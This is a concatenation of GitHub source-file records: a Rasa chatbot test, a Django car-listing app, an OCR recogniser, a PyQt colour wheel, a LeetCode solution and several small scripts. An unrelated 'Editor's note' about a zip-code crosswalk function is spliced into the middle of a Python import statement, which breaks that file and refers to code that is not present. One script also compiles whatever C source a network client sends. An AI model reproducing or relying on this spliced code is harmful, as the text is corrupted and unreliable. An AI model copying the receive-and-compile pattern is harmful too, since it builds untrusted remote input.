logging.basicConfig(level=logging.DEBUG,\n format=\"[%(filename)s:%(lineno)s] %(name)s - %(levelname)s - %(message)s\")\n\n print(\"=> Importing tensorflow...\")\n import tensorflow as tf\n tf.logging.set_verbosity(tf.logging.ERROR)\n\n print(\"=> Importing rasa...\")\n from rasa_core.interpreter import 
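Editor's note: county_to_zip in the crosswalk record above normalizes factor by each county's total, so the allocation weights should sum to one per FIPS code. A quick check, assuming the source CSVs are present under data_dir:

df = county_to_zip(year=2000, zip_level=3)
sums = df.groupby('fips')['factor'].sum()
print(sums.round(6).unique())   # expect [1.0]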
RasaNLUInterpreter\n from rasa_core.channels.console import ConsoleInputChannel\n from rasa_core.agent import Agent\n\n print(\"=> HC NLU Bot Initializing...\")\n print(\"Load NLU %s\" % botpath.NLU_DATA_FOLDER)\n interpreter = RasaNLUInterpreter(botpath.NLU_DATA_FOLDER)\n\n print(\"Load dialog %s\" % botpath.DIALOGUE_PATH)\n agent = Agent.load(botpath.DIALOGUE_PATH, interpreter=interpreter)\n if TEST_DIALOG:\n agent.handle_channel(ConsoleInputChannel())\n else:\n rasa_core.policies.MemoizationPolicy.ENABLE_FEATURE_STRING_COMPRESSION = False\n index = 0\n dialogs = [\n# ('车险', 'None\\n'),\n ('你好', '欢迎致电世界500强平安,我是王伟,工号6500\\n请问怎么称呼您\\n'),\n ('我叫张三丰', '欢迎你, 张三丰\\n请问您需要什么服务?\\n'),\n ('车险', '请问你的车牌是什么?\\n'),\n ('我的车牌是沪A12345', '您是平安的老客户了, 去年你投保的项目如下车损险,不计免赔,三责险100万, 车牌为沪牌, 总保费是5000元\\n'\n '请问确认要投保吗?\\n'),\n ('确认', '张三丰, 您的车牌号为沪a12345的车投保已成功,保险费为5000,谢谢.\\n'\n '请问您需要什么服务?\\n'),\n ]\n\n for question, expect in dialogs:\n cprint((\"%d. \" % index) + question, 'yellow')\n answers = agent.handle_message(question)\n answers_text = ''\n for msg in answers:\n if 'text' in msg:\n answers_text += msg['text'] + '\\n'\n if len(answers_text) == 0:\n answers_text = \"No answer\\n\"\n cprint((\"%d. \" % index) + answers_text, 'green')\n if answers_text != expect:\n cprint((\"测试失败, 期望:%s\\n\" % expect), 'red', attrs=['bold', 'blink'])\n break\n index += 1\n print(\"测试结束\")\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"fenixchen/bot","sub_path":"hcbot/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37368937070","text":"import os\nimport re\n\ndef read_all_files(folder):\n \"\"\"\n Reads all the files in the folder\n \"\"\"\n for root,dirs,files in os.walk(folder):\n print(\"Root: \", root)\n print(\"Dirs: \", dirs)\n print(\"Files: \", files)\n print(\"=====================================\")\n pattern = r\"\\.(exe|jpg|pyc)$\"\n for file in files:\n print(\"File: \", file)\n match = re.search(pattern, file)\n if match:\n pass\n else:\n with open(os.path.join(root,file),\"r\") as f:\n #print(f.read())\n print(len(f.read()))\n print(\"=====================================\")\n\nif __name__ == \"__main__\":\n path = \"D:\\projects\\LARGE Projects\\ipfs_uploader\"\n read_all_files(path)","repo_name":"arjunprakash027/collections","sub_path":"randoms/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74498879404","text":"import os\n\nfrom aiohttp import web\nfrom dotenv import load_dotenv\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom services import create_document_from_uploaded_json\n\nload_dotenv()\n\nCONNECTION_URL = os.getenv('CONNECTION_URL')\nAPI_PORT = int(os.getenv('API_PORT'))\n\nengine = create_async_engine(CONNECTION_URL, pool_size=1, max_overflow=0)\nasync_session = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\n\n\nasync def handle_upload(request):\n async with async_session() as session:\n async with session.begin():\n uploaded_document = await request.json()\n try:\n await create_document_from_uploaded_json(session=session, uploaded_document=uploaded_document)\n except IntegrityError:\n return web.Response(status=500)\n return web.Response()\n\n\nif __name__ == '__main__':\n app = 
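Editor's note: the extension filter in read_all_files above is case-sensitive, so 'photo.JPG' slips through the regex. An equivalent check via os.path.splitext with case folding (the SKIP_EXTS name is an addition):

import os

SKIP_EXTS = {'.exe', '.jpg', '.pyc'}

def should_skip(file_name):
    # Case-insensitive version of the r"\.(exe|jpg|pyc)$" filter.
    return os.path.splitext(file_name)[1].lower() in SKIP_EXTS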
web.Application()\n\n app.router.add_route(method='post', path='/upload/document/', handler=handle_upload)\n\n web.run_app(app, port=API_PORT)\n","repo_name":"Apoleonik/SmartMerchTask","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72253602922","text":"import secrets\n\nplayer_score = 0\ncomputer_score = 0\nwhile player_score < 3 and computer_score < 3: \n print(\"..paper..\")\n print(\"..rock..\")\n print(\"..scissors..\")\n print(f'Player score: {player_score}')\n print(f'Computer Score: {computer_score}')\n player1 = input().lower()\n computer = ['rock', 'paper', 'scissors']\n cpu = secrets.choice(computer)\n\n if player1 == 'quit' or player1 == 'q':\n break\n\n if player1 == cpu:\n print('Draw!')\n elif player1 == 'paper':\n if cpu == 'rock':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n elif player1 == 'rock':\n if cpu == 'scissors':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n elif player1 == 'scissors':\n if cpu == 'paper':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n else: \n print('Please enter a valid move!')\n\n\nprint(f'Player score: {player_score}')\nprint(f'Computer Score: {computer_score}')\nif player_score == 3:\n print('Player wins!')\nelif player_score == computer_score:\n print(\"It's a tie\")\nelse:\n print('Computer wins!')","repo_name":"babaliauskas/Python","sub_path":"RockPaperScissors/rockpaperscissors2.py","file_name":"rockpaperscissors2.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39538704520","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#inputs\nimport os\nparent_directory = os.path.abspath('')\nroot = os.path.abspath(os.path.join(parent_directory, os.pardir))\ndata_folder = '01-Data'\nclassifiers_folder = '02-Classifiers'\ngan_char_models_folder = 'models_char_gan'\nmodel_digits_letters_name = 'class_char_model_{}.h5'\nmixed_models_folder = 'models_mixed'\nmodel_symbols_letters_name = 'model_0symbol_1letter.h5'\nmodel_0_oO_name = 'model_0_oO.h5'\n\ncharacters_folder = 'characters'\ntest_images_folder = os.path.join(parent_directory, characters_folder)\ncharacter_to_test = '{}.png'\n\ndata_input_folder = os.path.join(root, 'test', 'data', 'input')\n\n\n# In[2]:\n\n\nfrom functions_score import *\nfrom functions_char_preparation import *\nfrom char_classification import classification, image_char_prepr\nimport sys\nimport shutil\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport string\nimport pandas as pd\nimport keras.backend as K #clear RAM\nimport docx\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# In[3]:\n\n\ncwd = os.getcwd()\ncwd\n\n\n# In[4]:\n\n\ndef buidDictionary():\n\n characters_all = list(string.printable)[:-6] #+['ç']# <\n j=-1\n dict_target=[]\n for char in characters_all:\n j=j+1\n dict_target.append([char,ord(char),j])\n dictionar=pd.DataFrame(dict_target).rename(columns={0:'Actual_char',1:'Actual_num',2:'Actual_id'})\n\n dictionar_symbols=dictionar[62:94]\n dictionar_letters=dictionar[0:62]\n\n #threshold for _,-\n from pandas import DataFrame\n pd_ = DataFrame(np.arange(0,32,1))\n Q1_ = pd_.quantile(0.25)\n Q3_ = pd_.quantile(0.75)\n IQR_ = Q3_ - Q1_\n\n return characters_all, 
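Editor's note: a hypothetical client for the aiohttp upload endpoint above (route taken from the code; the payload shape is whatever create_document_from_uploaded_json expects):

import asyncio
import aiohttp

async def upload(doc, port=8080):    # port: whatever API_PORT is set to
    async with aiohttp.ClientSession() as session:
        async with session.post(f'http://localhost:{port}/upload/document/',
                                json=doc) as resp:
            return resp.status       # 200 on success, 500 on IntegrityError

# asyncio.run(upload({'example': 'payload'}))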
dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_\n\n\n# In[5]:\n\n\nclass ML_Models():\n def addModel(self, modelsPath, modelOgirinalName, modelName):\n #char_models_filename = modelsPath.format(ord(char))\n char_models_filename = os.path.join(modelsPath, modelOgirinalName)\n print('char_models_filename', char_models_filename)\n\n if not hasattr(self, modelName):\n ml_model=tf.keras.models.load_model(char_models_filename)\n\n if modelName:\n setattr(self, modelName, ml_model)\n else:\n setattr(self, modelOgirinalName, ml_model)\n else:\n print('model ', modelName, ' in memory')\n\n\n# In[6]:\n\n\ndef loadModels(characters_all):\n \n if not 'charModels' in globals():\n print('charModels not in locals neither in globals')\n global charModels\n charModels = ML_Models()\n print('charModels', charModels)\n\n gan_char_models_path = os.path.join(root, classifiers_folder, gan_char_models_folder)\n for char in characters_all[0:62]:\n print(char)\n charModels.addModel(gan_char_models_path, model_digits_letters_name.format(ord(char)), f'model_letters{ord(char)}')\n #K.clear_session()\n\n\n mixed_models_path = os.path.join(root, classifiers_folder, mixed_models_folder)\n for char in characters_all[62:94]:\n print(char)\n charModels.addModel(mixed_models_path, model_symbols_letters_name, f'model_symbols{ord(char)}')\n #K.clear_session()\n \n charModels.addModel(mixed_models_path, model_symbols_letters_name, 'model_symbols_letters') \n charModels.addModel(mixed_models_path, model_0_oO_name, 'model_0_oO')\n\n else:\n print('charModels instantiated') \n\n return charModels\n\n\n# In[7]:\n\n\ndef char_img_preprocessing(img):\n #print('char_img_preprocessing', img)\n\n #img = cv2.imread(char_image)\n #print('img', img)\n #img = cv2.imread('C:\\\\Users\\\\Administrator\\\\OCR\\\\Final\\\\04-Recognition\\\\characters\\\\2.png')\n\n sorted_ctrs = char_preprocessing_step_1(img)\n #print('sorted_ctrs', sorted_ctrs)\n new_sorted_ctrs = char_preprocessing_step_2(sorted_ctrs,img)\n #print('new_sorted_ctrs', new_sorted_ctrs)\n temp_max_yh,temp_min_y = char_preprocessing_step_3(new_sorted_ctrs) #normalize height\n #print('temp_max_yh', temp_max_yh)\n #print('temp_min_y', temp_min_y)\n \n char_image,char_image_nh = char_preprocessing_step_4(img,new_sorted_ctrs,temp_max_yh,temp_min_y)\n \n return char_image, char_image_nh\n\n\n# In[8]:\n\n\ndef char_recognition(charModels, new_img, new_img_normheight, dictionar, dictionar_letters, dictionar_symbols, Q1_,Q3_): #recognize char \n import cv2 \n import numpy as np\n \n resized=image_char_prepr(new_img,2,20,0)\n resized_normheight=image_char_prepr(new_img_normheight,2,20,0)\n\n new_image_density=resized.sum()\n\n x_test_right = np.expand_dims(resized, axis=-1)\n x_test = np.expand_dims(x_test_right, axis=0)\n forecast,dictionartemp = classification(charModels, resized, resized_normheight, x_test, Q1_, Q3_, dictionar, dictionar_letters, dictionar_symbols)\n text_char =str(forecast)\n return text_char\n\n\n# In[9]:\n\n\n'''\ncaracteres com problemas: 132, 140, 147, 186, 194, 233, 241, 280, 288\n'''\nunhandledChars = [140, 147, 186, 194, 233, 241, 280, 288]\n\n\n\n\n# In[12]:\n\n\ndef main(char_image):\n print('CHAR_RECOGNITION')\n if len(char_image) == 0:\n data_input_folder = os.path.join(root, 'test', 'data', 'input')\n data_input_char_folder = os.path.join(data_input_folder, 'char_recognition')\n char_images_names = [f for f in listdir(data_input_char_folder) if isfile(join(data_input_char_folder, f))]\n print('char_images_names', char_images_names)\n 
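Editor's note: buidDictionary above slices string.printable[:-6] at 62 and 94. Those magic numbers follow from CPython's ordering of printable (10 digits + 26 lowercase + 26 uppercase = 62 alphanumerics, then 32 punctuation characters, then 6 whitespace characters), which this snippet verifies:

import string

chars = list(string.printable)[:-6]   # drop the 6 trailing whitespace chars
print(len(chars))                     # 94
print(''.join(chars[:62]))            # digits + letters -> dictionar_letters
print(''.join(chars[62:94]))          # punctuation      -> dictionar_symbols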
char_image_name = char_images_names[0]\n char_image=cv2.imread(os.path.join(data_input_char_folder, char_image_name))\n\n characters_all, dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_ = buidDictionary()\n \n charModels = loadModels(characters_all)\n\n _char_image, char_image_nh = char_img_preprocessing(char_image)\n\n text_char = char_recognition(charModels, _char_image[0], char_image_nh[0], dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_)\n print('text_char', text_char)\n\n return text_char\n\n\nif __name__ == '__main__':\n main(sys.argv[1]) \n\n","repo_name":"luispmb/orc","sub_path":"controllers/char_recognition.py","file_name":"char_recognition.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36547736470","text":"import math\nfrom collections import Counter\n\n\nclass Solution:\n def numTilePossibilities(self, tiles: str) -> int:\n combinations = set()\n\n def calculate_combinations(arr, start, prev, length):\n if len(prev) == length:\n combinations.add(\"\".join(prev))\n return\n\n for pos in range(start, len(arr)):\n prev.append(arr[pos])\n calculate_combinations(arr, pos + 1, prev, length)\n prev.pop()\n\n tiles_sorted = list(sorted(tiles))\n\n for length in range(1, len(tiles_sorted) + 1):\n calculate_combinations(tiles_sorted, 0, [], length)\n\n result = 0\n for combination in combinations:\n sub_result = math.factorial(len(combination))\n for count in Counter(combination).values():\n sub_result /= math.factorial(count)\n\n result += int(sub_result)\n\n return result\n","repo_name":"fspv/learning","sub_path":"l33tcode/letter-tile-possibilities.py","file_name":"letter-tile-possibilities.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"43371755293","text":"from typing import Any\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views import generic\nfrom final_app.models import Car, Account, Post\nfrom .forms import CarForm, CreateUserForm, UserProfileForm, PostForm\nfrom django.contrib.auth.models import User, Group\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import allowed_users\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\n# Create your views here.\n@login_required\ndef homepage(request):\n\n homepage_cars = Car.objects.order_by('-id')[:3]\n accounts = Account.objects.all()\n \n return render( request, 'final_app/homepage.html', { 'homepage_cars':homepage_cars, 'accounts':accounts })\n\n@login_required(login_url='login')\ndef createCar(request):\n\n form = CarForm()\n if request.method == 'POST':\n form = CarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home_page')\n return render(request, 'final_app/car_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef editCar(request, pk):\n\n car = get_object_or_404(Car, pk=pk)\n form = CarForm(request.POST, request.FILES, instance = car)\n if form.is_valid():\n form.save()\n return redirect('car-detail', pk)\n return render(request, 'final_app/car_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deleteCar(request, pk):\n\n car = get_object_or_404(Car, pk=pk)\n if request.method=='POST':\n car.delete()\n return redirect('home_page')\n return render(request, 
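Editor's note: the final loop of numTilePossibilities above counts the arrangements of each multiset combination with the multinomial formula n! / prod(c_i!). A worked instance:

import math
from collections import Counter

comb = "AAB"                     # one combination of length 3
n = math.factorial(len(comb))    # 3! = 6 orderings
for c in Counter(comb).values():
    n //= math.factorial(c)      # divide out the 2! repeats of 'A'
print(n)                         # 3: AAB, ABA, BAA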
'final_app/delete_car.html', {'car':car})\n\ndef registerPage(request):\n\n form = CreateUserForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n group = Group.objects.get(name='Users')\n user.groups.add(group)\n\n messages.success(request, 'Account was successfully created for ' + username)\n return redirect('create_profile')\n context = {'form':form}\n return render(request, 'registration/register.html', context)\n\ndef createProfile(request):\n\n form = UserProfileForm()\n if request.method == 'POST':\n form = UserProfileForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home_page')\n return render(request, 'final_app/profile_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef editAccount(request, pk):\n\n account = get_object_or_404(Account, pk=pk)\n form = UserProfileForm(request.POST or None, instance = account)\n if form.is_valid():\n form.save()\n return redirect('account-profile', pk)\n return render(request, 'final_app/profile_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deleteAccount(request, pk) :\n\n account = get_object_or_404(Account, pk=pk)\n if request.method=='POST':\n account.delete()\n return redirect('home_page')\n return render(request, 'final_app/delete_car.html', {'account':account})\n\n@login_required(login_url='login')\ndef createPost(request):\n \n form = PostForm()\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('posts')\n return render(request, 'final_app/post_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deletePost(request, pk):\n \n post = get_object_or_404(Post, pk=pk)\n if request.method == 'POST':\n post.delete()\n return redirect('posts')\n return render(request, 'final_app/delete_post.html', {'post':post})\n\nclass CarListView(LoginRequiredMixin,generic.ListView):\n model = Car\nclass CarDetailView(LoginRequiredMixin, generic.DetailView):\n model = Car\nclass AccountDetailView(LoginRequiredMixin, generic.DetailView):\n model = Account\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['account_cars'] = Car.objects.filter(owner_id=self.kwargs['pk'])\n return context\n \nclass PostListView(LoginRequiredMixin,generic.ListView):\n model = Post\nclass PostDetailView(LoginRequiredMixin, generic.DetailView):\n model = Post\n","repo_name":"Oscar2060/FinalProject","sub_path":"final_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18882514533","text":"from subprocess import call\nimport socket\nimport sys\nimport time\n\nconnect = 1\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = time.time() + 60\n\nserver_address = ('192.168.1.191', 10000)\nprint('starting server on {} port {}'.format(*server_address))\n\nsock.bind(server_address)\nsock.listen(1)\n\nwhile connect > 0:\n print('waiting for a connection')\n connection, client_address = sock.accept()\n\n try:\n print('connection from', client_address)\n while True:\n if time.time() > timeout:\n connect -= 1\n raise StopIteration\n data = connection.recv(1024)\n print('received {!r}'.format(data))\n connect -= 1\n raise StopIteration\n\n\n except StopIteration: pass\n\nprint(\"Goodbye\")\nconnection.close()\n\n\nwith 
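Editor's note: editCar and editAccount above bind request.POST unconditionally, so a plain GET renders the form with validation errors instead of the instance's current values. The conventional Django pattern separates the two cases (sketch; edit_car is a renamed illustration):

def edit_car(request, pk):
    car = get_object_or_404(Car, pk=pk)
    if request.method == 'POST':
        form = CarForm(request.POST, request.FILES, instance=car)
        if form.is_valid():
            form.save()
            return redirect('car-detail', pk)
    else:
        form = CarForm(instance=car)  # unbound form pre-filled from the instance
    return render(request, 'final_app/car_form.html', {'form': form})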
open('stream_file.c', 'w') as stream_file:\n stream_file.write(data)\n\n\ncall([\"gcc\", \"stream_file.c\"])\n","repo_name":"JonReinhold/rube-goldberg-projects","sub_path":"expanded-hello-world/HelloServer.py","file_name":"HelloServer.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6331743973","text":"\nfrom math import cos, sin, pi, sqrt, atan2\nfrom PyQt4 import QtGui, QtCore\n\nfrom color.colors import *\nfrom widgets import *\n\nclass Wheel(CacheImage):\n def __init__(self, mixer=None, w=0, h=0):\n self.luma = 0.5\n CacheImage.__init__(self, mixer, w, h)\n\n def calc(self):\n self.colors = []\n for chroma in seq(0, 1, 0.05):\n steps = max( 100 * 2*pi*chroma / 5.0, 6)\n lst = []\n for hue in seq(0, 1, 1.0/steps):\n color = hcy(hue, chroma, self.luma)\n lst.append(color)\n self.colors.append(lst)\n\n def draw(self, w, h):\n assert w is not None\n assert h is not None\n assert w > 0\n assert h > 0\n self.image = QtGui.QImage(w, h, QtGui.QImage.Format_ARGB32_Premultiplied)\n assert not self.image.isNull()\n self.image.fill(0)\n qp = QtGui.QPainter()\n qp.begin(self.image)\n x0, y0 = w/2.0, h/2.0\n Rmax = min(w,h)/2.0\n step_chroma = 1.0 / float(len(self.colors))\n step_r = Rmax * step_chroma\n\n color = hcy(0,0,self.luma)\n qp.setBrush(color)\n qp.setPen(color)\n qp.drawEllipse(x0-step_r, y0-step_r, step_r*2 + 1, step_r*2 + 1)\n\n for i, ring in enumerate(self.colors[1:]):\n if i == 0:\n continue\n step_hue = 1.0/ float(len(ring))\n step_alpha = 360.0 * step_hue \n r = i*step_r\n R = (i+1)*step_r\n iw = ih = 2*r\n ow = oh = 2*R\n ox = (w-ow)/2.0\n oy = (h-oh)/2.0\n ix = (w-iw)/2.0\n iy = (h-ih)/2.0\n outrect = QtCore.QRectF(ox, oy, ow, oh)\n inrect = QtCore.QRectF(ix,iy, iw,ih)\n for j, color in enumerate(ring):\n a = 2*pi*j*step_hue\n b = 2*pi*(j+1)*step_hue\n alpha = j*step_alpha\n xA, yA = x0 + R*cos(a), y0 - R*sin(a)\n xB, yB = x0 + r*cos(b), y0 - r*sin(b)\n path = QtGui.QPainterPath()\n path.moveTo(xA, yA)\n path.arcTo(outrect, alpha, step_alpha)\n path.arcTo(inrect, (alpha+step_alpha), - step_alpha)\n #print(\"A: {}, {}\".format(xA,yA))\n #path.lineTo(xA, yA)\n #path.closeSubpath()\n qp.setPen(color)\n qp.drawPath(path)\n qp.fillPath(path, color)\n qp.end()\n\nclass Slider(CacheImage):\n def __init__(self, mixer=None, w=0, h=0):\n self.hue = 0\n CacheImage.__init__(self, mixer, w, h)\n\n N = 50\n\n def calc(self):\n self.colors = []\n for i in range(self.N):\n self.colors.append(hcy(self.hue, 1.0, 1.0 - i/float(self.N)))\n\n def draw(self, w, h):\n w = min(w, 30)\n self.image = QtGui.QImage(w, h, QtGui.QImage.Format_ARGB32_Premultiplied)\n self.image.fill(0)\n qp = QtGui.QPainter()\n qp.begin(self.image)\n rw = w\n rh = h / float(self.N)\n for i,color in enumerate(self.colors):\n x = 0\n y = i * rh\n qp.setBrush(color)\n qp.setPen(color)\n qp.drawRect(x,y, rw, rh)\n qp.end()\n\nclass WheelWidget(QtGui.QWidget):\n\n clicked = QtCore.pyqtSignal(bool, float, float)\n edited = QtCore.pyqtSignal()\n\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.cache = Wheel()\n self.mouse_pressed = False\n self._selected = None\n self.hue = 0\n self.chroma = 0\n self.luma = 0\n self._harmonized = None\n self._harmony = None\n self._harmony_parameter = 0.5\n self._dragged = None\n self.enable_editing = False\n\n def _get_nearest(self, x,y):\n if not self.enable_editing:\n return None\n if not self._harmonized:\n return None\n rho_min = None\n result = None\n for idx, pair in 
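Editor's note: two fragile spots in the socket server above: data is only bound if a client actually sent something before the timeout, and it is a bytes object written through a text-mode handle. A guarded tail under those assumptions:

data = b''          # before the accept loop, so the tail below is always safe

# ... accept loop unchanged ...

if data:            # only write and compile if something actually arrived
    with open('stream_file.c', 'wb') as stream_file:   # bytes need binary mode
        stream_file.write(data)
    call(["gcc", "stream_file.c"])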
enumerate(self._harmonized):\n hue, chroma = pair\n x1,y1 = self._hc_to_xy(hue, chroma)\n rho2 = (x-x1)**2 + (y-y1)**2\n if rho2 < 25:\n if rho_min is None or rho2 < rho_min:\n rho_min = rho2\n result = idx\n print(\"Nearest to ({}, {}): #{}\".format(x,y,result))\n return result\n\n def mousePressEvent(self, event):\n #print(\"Mouse pressed\")\n self.setFocus(QtCore.Qt.OtherFocusReason)\n self.mouse_pressed = True\n if self._harmony is None:\n self._dragged = self._get_nearest(event.x(), event.y())\n event.accept()\n\n def mouseReleaseEvent(self, event):\n #print(\"Mouse released\")\n self.mouse_pressed = False\n x,y = event.x(), event.y()\n if self._dragged is None:\n self._select(x,y)\n self._dragged = None\n event.accept()\n\n def mouseMoveEvent(self, event):\n x,y = event.x(), event.y()\n if self.mouse_pressed:\n if self._dragged is None:\n self._select(x,y)\n else:\n self._drag(x,y)\n\n def wheelEvent(self, event):\n steps = event.delta()/120.0\n apply_to_harmonized = self.enable_editing and self._harmonized\n\n if event.modifiers() & QtCore.Qt.ControlModifier:\n fn = lambda h,c : ((h+0.01*steps)%1, c)\n else:\n fn = lambda h,c : (h, clip(c+0.1*steps))\n\n if apply_to_harmonized:\n self._harmonized = [fn(h,c) for h,c in self._harmonized]\n\n if self._selected:\n h,c = self._xy_to_hc(*self._selected)\n h1,c1 = fn(h,c)\n self._selected = self._hc_to_xy(h1,c1)\n self.hue = h1\n self.chroma = c1\n self.clicked.emit(self.mouse_pressed, h1,c1)\n\n self.repaint()\n if apply_to_harmonized:\n self.edited.emit()\n\n def _xy_to_hc(self, x,y):\n w, h = self.size().width(), self.size().height()\n x0, y0 = w/2.0, h/2.0\n R = min(x0,y0)\n dx, dy = x-x0, y-y0\n chroma = sqrt(dx**2 + dy**2)/R\n if chroma > 1.0:\n return None\n hue = atan2(-dy, dx)/(2*pi)\n return (hue, chroma)\n\n def _hc_to_xy(self, hue, chroma):\n w, h = self.size().width(), self.size().height()\n x0, y0 = w/2.0, h/2.0\n R = min(x0,y0)\n x = x0 + chroma*R*cos(hue*2*pi)\n y = y0 - chroma*R*sin(hue*2*pi)\n return (x,y)\n\n def _apply_hc(self, fn, xy):\n h,c = self._xy_to_hc(*xy)\n h1,c1 = fn(h,c)\n return self._hc_to_xy(h1,c1)\n\n def paintEvent(self, event):\n w, h = self.size().width(), self.size().height()\n image = self.cache.get(w, h)\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.drawImage(0, 0, image)\n\n if self._selected is not None:\n x,y = self._selected\n qp.setBrush(QtGui.QColor(255,255,255, 127))\n qp.setPen(Color(0,0,0))\n qp.drawEllipse(x-4, y-4, 8, 8)\n\n if self._harmonized is not None:\n for idx, pair in enumerate(self._harmonized):\n hue, chroma = pair\n x,y = self._hc_to_xy(hue, chroma)\n if self._dragged == idx:\n qp.setBrush(Color(255,255,255))\n else:\n qp.setBrush(QtGui.QColor(0,0,0,0))\n qp.setPen(Color(0,0,0))\n qp.drawRect(x-3, y-3, 6, 6)\n\n qp.end()\n\n def _drag(self, x,y):\n s = self._xy_to_hc(x,y)\n if s is None:\n return\n\n hue,chroma = s\n self._harmonized[self._dragged] = (hue, chroma)\n self.repaint()\n self.edited.emit()\n\n def _select(self, x, y):\n w, h = self.width(), self.height()\n x0, y0 = w/2.0, h/2.0\n dx, dy = x-x0, y-y0\n R = min(x0,y0)\n chroma = sqrt(dx**2 + dy**2)/R\n if chroma > 1.0:\n return\n hue = atan2(-dy, dx)/(2*pi)\n self._selected = x,y\n self.repaint()\n self.hue = hue\n self.chroma = chroma\n\n if self._harmony is not None:\n self._calc_harmony(self.get_color())\n\n self.clicked.emit(self.mouse_pressed, hue, chroma)\n\n def select(self, hue, chroma):\n x,y = self._hc_to_xy(hue, chroma)\n self._selected = x,y\n self._calc_harmony(hcy(hue, chroma, self.luma))\n 
#self.repaint()\n\n def get_color(self):\n return hcy(self.hue, self.chroma, self.luma)\n\n def set_luma(self, luma):\n self.luma = luma\n self.cache.luma = luma\n self.cache.redraw(self.width(), self.height())\n\n def _calc_harmony(self, current):\n if self._harmony is None:\n return\n #print(\"Calc harmony from {}\".format(str(current)))\n colors = self._harmony.get(current, self._harmony_parameter)\n self._harmonized = []\n for clr in colors:\n h,c,y = clr.getHCY()\n self._harmonized.append((h,c))\n\n def set_harmony(self, harmony, current):\n self._harmony = harmony\n self._calc_harmony(current)\n self.repaint()\n\n def set_harmony_parameter(self, value, current):\n self._harmony_parameter = value\n self._calc_harmony(current)\n self.repaint()\n\nclass SliderWidget(QtGui.QWidget):\n\n clicked = QtCore.pyqtSignal(bool, float)\n\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.cache = Slider()\n self.mouse_pressed = False\n self.luma = 0.5\n\n def mousePressEvent(self, event):\n #print(\"Mouse pressed\")\n self.setFocus(QtCore.Qt.OtherFocusReason)\n self.mouse_pressed = True\n event.accept()\n\n def mouseReleaseEvent(self, event):\n #print(\"Mouse released\")\n self.mouse_pressed = False\n x,y = event.x(), event.y()\n self._select(y)\n event.accept()\n\n def mouseMoveEvent(self, event):\n x,y = event.x(), event.y()\n if self.mouse_pressed:\n self._select(y)\n\n def wheelEvent(self, event):\n steps = event.delta()/120.0\n if self.luma is not None:\n self.luma = clip(self.luma + 0.05*steps)\n self.repaint()\n self.clicked.emit(self.mouse_pressed, self.luma)\n\n def paintEvent(self, event):\n w, h = self.size().width(), self.size().height()\n image = self.cache.get(w, h)\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.drawImage(0, 0, image)\n if self.luma is not None:\n y0 = (1.0 - self.luma) * h\n qp.setPen(Color(0,0,0))\n w = min(w, 35)\n qp.drawRect(0,y0-2, w, 4)\n qp.end()\n\n def _select(self, y):\n w, h = self.width(), self.height()\n self.luma = float(h-y)/float(h)\n #print(\"Slider._select({})\".format(self.luma))\n self.repaint()\n self.clicked.emit(self.mouse_pressed, self.luma)\n\n def select(self, luma):\n self.luma = luma\n #print(\"Slider.select({})\".format(self.luma))\n \n def get_luma(self):\n return self.luma\n\nclass HCYSelector(QtGui.QWidget):\n\n selected = QtCore.pyqtSignal(int, Color, Color)\n edited = QtCore.pyqtSignal()\n\n manual_edit_implemented = True\n\n def __init__(self, *args):\n QtGui.QWidget.__init__(self, *args)\n self.box = 